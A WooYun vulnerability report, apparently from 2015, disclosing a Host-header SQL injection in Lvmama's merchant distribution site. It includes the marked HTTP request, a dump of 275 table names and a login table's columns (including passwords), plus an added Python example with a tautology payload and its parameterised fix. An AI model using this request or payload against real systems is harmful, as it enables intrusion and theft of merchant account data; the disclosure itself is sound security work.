
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0136181

Title: Flaw in a key Lvmama merchant system leaks merchant information

Vendor: Lvmama (驴妈妈旅游网)

Author: BMa

Submitted: 2015-08-23 00:07

Fixed: 2015-10-08 09:06

Published: 2015-10-08 09:06

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-23: Details sent to the vendor, awaiting vendor action
2015-08-24: Vendor confirmed; details visible to the vendor only
2015-09-03: Details disclosed to core white hats and domain experts
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

Brief description:

Flaw in a key Lvmama merchant system leaks merchant information

Detailed description:

GET / HTTP/1.1
Host: fenxiao.lvmama.com*
X-Requested-With: XMLHttpRequest
Referer: http://fenxiao.lvmama.com:80/
Cookie: JSESSIONID=fli0vCk01kra; startadd=10044; Apache=116.31.83.146.1440224292744816
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


Injection point: the Host header. In the request above, the * after fenxiao.lvmama.com marks the position where the injected value goes; the affected host is the merchant distribution platform.

[Four screenshots attached in the original report: 1.png, 2.png, 3.png, 4.png]
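The report shows only the request and the dumped schema, not the server-side code. The following is an added example (not from the original report and not Lvmama's code) of the server-side pattern that produces a Host-header injection like this one: a multi-tenant lookup that interpolates the Host header into a query, shown beside a validated and parameterised form. It assumes a hypothetical MERCHANT_SITE table and uses sqlite3 in place of the Oracle backend the dump indicates (VARCHAR2/NUMBER column types, MLOG$/RUPD$ materialized-view log tables); the rows, host names and payload are constructed for the example.

```python
import re
import sqlite3

# Added example, not code from the report or from the vendor. A hypothetical
# MERCHANT_SITE table stands in for whatever table the real application
# consults; sqlite3 stands in for the Oracle backend the dump indicates.
SAMPLE_ROWS = [  # constructed sample data
    (10044, "shop-a.example.test", "merchant_a"),
    (10045, "shop-b.example.test", "merchant_b"),
]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE MERCHANT_SITE (CUST_ID INTEGER, HOSTNAME TEXT, USER_NAME TEXT)"
    )
    conn.executemany("INSERT INTO MERCHANT_SITE VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_tenant_vulnerable(conn: sqlite3.Connection, host: str) -> list:
    # The Host header value is concatenated into the statement. A value such
    # as  x' OR '1'='1  turns the WHERE clause into a tautology; a UNION or a
    # blind payload in the same position lets the schema be enumerated, which
    # is how a table and column listing like the one in the proof is obtained.
    sql = (
        "SELECT CUST_ID, USER_NAME FROM MERCHANT_SITE WHERE HOSTNAME = '"
        + host
        + "'"
    )
    return conn.execute(sql).fetchall()


# RFC 1123 host name: dot-separated labels of letters, digits and hyphens,
# at most 63 chars per label and 253 overall. Bracketed IPv6 literals are
# out of scope for this example.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$"
)


def normalise_host(host: str) -> str:
    # Drop an optional :port, lower-case, then require valid host-name syntax.
    # Quotes, spaces and comment sequences never survive this check.
    h = host.strip()
    if re.search(r":\d{1,5}$", h):
        h = h.rsplit(":", 1)[0]
    h = h.lower()
    if not _HOSTNAME_RE.match(h):
        raise ValueError("invalid Host header")
    return h


def is_valid_host(host: str) -> bool:
    try:
        normalise_host(host)
        return True
    except ValueError:
        return False


def lookup_tenant_safe(conn: sqlite3.Connection, host: str) -> list:
    # Validation plus a bound parameter: the value can no longer change the
    # shape of the statement, whatever it contains.
    h = normalise_host(host)
    return conn.execute(
        "SELECT CUST_ID, USER_NAME FROM MERCHANT_SITE WHERE HOSTNAME = ?", (h,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(lookup_tenant_vulnerable(db, "shop-a.example.test"))  # one row
    print(lookup_tenant_vulnerable(db, "x' OR '1'='1"))         # every row
    print(lookup_tenant_safe(db, "SHOP-A.example.test:80"))     # one row
    print(is_valid_host("x' OR '1'='1"))                        # False
```

The Host header is attacker-controlled even when the rest of the request looks benign: proxies pass it through unchanged, and multi-tenant platforms routinely read it to select the tenant or build absolute URLs, which makes it a sink that input filtering on query parameters never sees. The bound parameter removes the injection on its own; the syntax check additionally rejects a malformed Host before it reaches any other sink such as logging, caching or redirect construction.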


Proof of vulnerability:

Database: SAAS0
[275 tables]
+-----------------------------+
| ALITRIP_COUNTRY |
| ALITRIP_HOTEL222 |
| ALITRIP_MENPIAO_ORDER |
| ALITRIP_MENPIAO_RECEIVE |
| ALITRIP_ROOMTYPE222 |
| AUDIT_INFO |
| AUDIT_TICKET |
| B2B_SETTLE_METHOD |
| B2C_TAOBAO_CONFIG |
| B2C_TAOBAO_LOG |
| B2C_TAOBAO_NOTIFYRECEIVEMSG |
| B2C_TAOBAO_ORDER |
| B2C_TAOBAO_ORDER_LOG |
| B2C_TAOBAO_PRODUCT |
| BAIDU_TICKET_INFO |
| BAIDU_TICKET_LOG |
| BAIDU_TICKET_VIEW |
| BANK_CITYCODE |
| CM_INFO_NEWS |
| CRUEL_CODE_CUST |
| CRUEL_CODE_LIST |
| CRUEL_CODE_LOG |
| CRUEL_CODE_MESSAGE |
| CRUEL_CODE_POS |
| CRUEL_CODE_VERIFY |
| CRUEL_EXP_CODE |
| CRUEL_EXP_LIST |
| CUST_BALANCE_LOG |
| CUST_INFO_GROUP_CHANNEL |
| EXPCODE_DETAIL |
| EXPCODE_LIST |
| HOTEL_BRAND |
| HOTEL_DISTRICT |
| HOTEL_INFO |
| IMGCODE |
| INFO_AREA |
| INFO_AREA_EX |
| INFO_BANK |
| INFO_BANK_TMP |
| INFO_CAR_TYPE |
| INFO_VISA_SORT |
| INTERFACE_DIANPING_CUST |
| INTERFACE_FZG_BIZZONE |
| INTERFACE_FZG_HOTEL |
| INTERFACE_HOTEL |
| INTERFACE_HOTEL_MIKI_PW |
| INTERFACE_HOTEL_SET |
| INTERFACE_IMAGECO |
| INTERFACE_IMAGECO_CUST |
| INTERFACE_INFO |
| INTERFACE_LINE |
| INTERFACE_LLK_CODE |
| INTERFACE_LLK_CUST |
| INTERFACE_LOG |
| INTERFACE_LONG |
| INTERFACE_LUOHUSHAN_LOG |
| INTERFACE_MAP |
| INTERFACE_MEITUAN |
| INTERFACE_MTS |
| INTERFACE_MTS_LOG |
| INTERFACE_PIAOGJ |
| INTERFACE_PRICE_RULE |
| INTERFACE_QUNAR |
| INTERFACE_QUNAR_HOTEL |
| INTERFACE_QUNAR_HOTEL_LOG |
| INTERFACE_QUNAR_LINE_LOG |
| INTERFACE_QUNAR_LOG |
| INTERFACE_QUNAR_MOVE |
| INTERFACE_ROOM |
| INTERFACE_SUPPLY_SYNC_LOG |
| INTERFACE_TICKET |
| INTERFACE_USER_SET |
| INTERFACE_USER_SET_LOG |
| INTERFACE_XIECHENG_LOG |
| JP_INFO_AIRPORT |
| JP_INFO_AIRWAYS |
| JP_INFO_FLIGHT |
| JP_INFO_PLANE |
| MANAGE_T_LOG |
| MLOG$_B2B_SETTLE_METHOD |
| MLOG$_B2B_SETTLE_METHOD1 |
| MLOG$_B2B_TICKET_DETAIL |
| MLOG$_HOTEL_BRAND |
| MLOG$_HOTEL_BRAND1 |
| MLOG$_HOTEL_DISTRICT |
| MLOG$_HOTEL_DISTRICT1 |
| MLOG$_HOTEL_INFO |
| MLOG$_HOTEL_INFO1 |
| MLOG$_INFO_AREA |
| MLOG$_INFO_AREA1 |
| MLOG$_INFO_AREA_EX |
| MLOG$_INFO_AREA_EX1 |
| MLOG$_INFO_BANK |
| MLOG$_INFO_BANK1 |
| MLOG$_INFO_CAR |
| MLOG$_INFO_CONDS |
| MLOG$_INFO_HOTEL |
| MLOG$_INFO_NEWS |
| MLOG$_INFO_PROD |
| MLOG$_INFO_TICKET |
| MLOG$_INFO_TICKET_CANCEL |
| MLOG$_INFO_TICKET_COND |
| MLOG$_INFO_TICKET_DETAIL |
| MLOG$_INFO_TICKET_EX |
| MLOG$_INFO_TICKET_PRICE |
| MLOG$_INFO_TICKET_RELAREA |
| MLOG$_INFO_TICKET_RELVIEW |
| MLOG$_INFO_TRAVEL |
| MLOG$_INFO_VISA |
| MLOG$_INFO_VISA_SORT |
| MLOG$_INFO_VISA_SORT1 |
| MLOG$_INTERFACE_LLK_CUST |
| MLOG$_ROOM_INFO |
| MLOG$_SAAS_PERMISSION |
| MLOG$_SAAS_PERMISSION1 |
| MLOG$_SAAS_USER_INFO |
| MLOG$_SAAS_USER_INFO1 |
| MLOG$_TB_USR_INFO |
| MLOG$_TB_USR_INFO1 |
| MLOG$_TB_VIEW_INFO |
| MLOG$_TB_VIEW_INFO1 |
| MLOG$_USR_ENTERPRISE_TAG |
| MLOG$_USR_TAG |
| MLOG$_USR_TAG1 |
| MLOG$_USR_VIEW |
| MLOG$_USR_VIEW1 |
| ONLINE_DEBUG_LOG |
| PARENT_CUSTID_INFO |
| PLAN_TABLE |
| QUNAR_AREA_INFO |
| RECE_PAYMENT_LIST |
| ROOM_INFO |
| RUPD$_B2B_SETTLE_METHOD |
| RUPD$_B2B_SETTLE_METHOD1 |
| RUPD$_B2B_TICKET |
| RUPD$_B2B_TICKET_DETAIL |
| RUPD$_HOTEL_BRAND |
| RUPD$_HOTEL_BRAND1 |
| RUPD$_HOTEL_DISTRICT |
| RUPD$_HOTEL_DISTRICT1 |
| RUPD$_HOTEL_INFO |
| RUPD$_HOTEL_INFO1 |
| RUPD$_INFO_AREA |
| RUPD$_INFO_AREA1 |
| RUPD$_INFO_AREA_EX |
| RUPD$_INFO_AREA_EX1 |
| RUPD$_INFO_BANK |
| RUPD$_INFO_BANK1 |
| RUPD$_INFO_CAR |
| RUPD$_INFO_CONDS |
| RUPD$_INFO_HOTEL |
| RUPD$_INFO_NEWS |
| RUPD$_INFO_PROD |
| RUPD$_INFO_TICKET |
| RUPD$_INFO_TICKET_CANCEL |
| RUPD$_INFO_TICKET_COND |
| RUPD$_INFO_TICKET_DETAIL |
| RUPD$_INFO_TICKET_EX |
| RUPD$_INFO_TICKET_PRICE |
| RUPD$_INFO_TICKET_RELAREA |
| RUPD$_INFO_TICKET_RELVIEW |
| RUPD$_INFO_TRAVEL |
| RUPD$_INFO_VISA |
| RUPD$_INFO_VISA_SORT |
| RUPD$_INFO_VISA_SORT1 |
| RUPD$_INTERFACE_LLK_CUST |
| RUPD$_ROOM_INFO |
| RUPD$_SAAS_PERMISSION |
| RUPD$_SAAS_PERMISSION1 |
| RUPD$_SAAS_USER_INFO |
| RUPD$_SAAS_USER_INFO1 |
| RUPD$_TB_USR_INFO |
| RUPD$_TB_USR_INFO1 |
| RUPD$_TB_VIEW_INFO |
| RUPD$_TB_VIEW_INFO1 |
| RUPD$_USR_ENTERPRISE_TAG |
| RUPD$_USR_TAG |
| RUPD$_USR_TAG1 |
| RUPD$_USR_VIEW |
| RUPD$_USR_VIEW1 |
| SAAS_AGENT_INFO |
| SAAS_AREA_SUB |
| SAAS_BUY_LOG |
| SAAS_CLUSTER |
| SAAS_INFO_AREA |
| SAAS_INFO_SUB |
| SAAS_MESSAGE_ADDIN |
| SAAS_MESSAGE_RSS |
| SAAS_MONITORING |
| SAAS_NEWS |
| SAAS_NEWS_SORT |
| SAAS_NOTICE |
| SAAS_ORDER_CHANNEL |
| SAAS_ORDER_SOURCE |
| SAAS_PAY_DRAWMONEY |
| SAAS_PAY_DRAWMONEY_LOG |
| SAAS_PAY_PRODUCT_TYPE |
| SAAS_PAY_SERVICE |
| SAAS_PAY_SET |
| SAAS_PERMISSION |
| SAAS_PROD_TYPE |
| SAAS_SERVICE |
| SAAS_SERVICE_ADD_LOG |
| SAAS_SMS_TEMP |
| SAAS_TABLE_SQL |
| SAAS_USER_INFO |
| SAAS_USER_INFO_LOG |
| SAAS_USER_MEMO |
| SAAS_USER_PAYSET |
| SAAS_VAP_ORDER |
| SAAS_VAP_PRODUCT |
| SAAS_VIEW_SUB |
| SITE_IP2 |
| SMSINTERFACE_INFO |
| SMSINTERFACE_SET_LOG |
| SMSINTERFACE_USER_SET |
| SMS_CONSUME_LOG |
| SMS_GETMONEY_LOG |
| SYSLOG_TYPE |
| SYS_CURRENCY_RATE |
| SYS_FEE_LOG |
| SYS_MENU |
| SYS_REFER |
| SYS_REPORT_DAY |
| SYS_SMS_LOG |
| SYS_SQL_HISTORY |
| SYS_SQL_QUEUE |
| SYS_UPDATE_LOG |
| TB_CONSUME_CODE |
| TB_RECEIVE_LOG |
| TB_USR_INFO |
| TB_VIEW_INFO |
| TEMP_LTJL_AREA_INFO |
| TEMP_SYR_AREA_INFO |
| TMP_USR_VIEW |
| TOUR_GUIDE |
| T_EQUIP |
| T_EQUIPSUB |
| T_LANDMARK |
| T_MATERIA |
| T_PRO_COMMON_PRICE |
| T_PRO_DETAIL_COURSE |
| T_REGIONS |
| T_REGIONS_QD |
| T_REGIONS_SUBWAY |
| T_SPORTTYPE |
| T_VENUE |
| T_VENUE_COUNT |
| T_VENUE_PRICE |
| T_VENUE_RECORD |
| T_VENUE_SUB |
| UNIONPAY_CONFIG |
| UNIONPAY_TRADE_LOG |
| UPDATE_FOREXPRICE_LOG |
| USR_ENTERPRISE_TAG |
| USR_INFO |
| USR_LOGIN |
| USR_MSG |
| USR_MSG_COMMENT |
| USR_MSG_MONEY |
| USR_PAGES |
| USR_POWER_AREA |
| USR_TAG |
| USR_VIEW |
| USR_VIEW_BOUNTY |
| USR_VIEW_COLUMN |
| USR_VIEW_COPY |
| USR_VIEW_LINK |
| USR_VIEW_MSG |
| USR_VIEW_MSG_HIS |
| USR_VIEW_NAV |
| USR_VIEW_PAGE |
| USR_VIEW_TEMPLATE |
| WX_SET |
| WX_TEMP_INFO |
+-----------------------------+

Database: SAAS0
Table: USR_LOGIN
[22 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ANDROID_UID | VARCHAR2 |
| CUST_ID | NUMBER |
| DEPT_ID | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| FAX | VARCHAR2 |
| IS_DISPRICE | NUMBER |
| IS_MANAGER | NUMBER |
| IS_VALIDATE | NUMBER |
| LAST_DATE | DATE |
| LAST_IP | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LYT_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| PARENT_AGENT_ID | NUMBER |
| PHONE | VARCHAR2 |
| PW | VARCHAR2 |
| ROLE_ID | NUMBER |
| ROLE_TYPE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PERMISSION | VARCHAR2 |
+-----------------+----------+

Suggested fix:

Copyright notice: when reposting, credit the source BMa@乌云 (WooYun)


Vendor response

Vendor reply:

Severity: Medium

Rank: 10

Confirmed: 2015-08-24 09:04

Vendor comment:

Thanks

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-08-23 09:42 | sm0nk (Regular white hat | Rank:174 Vulns:30 | all is well)

    6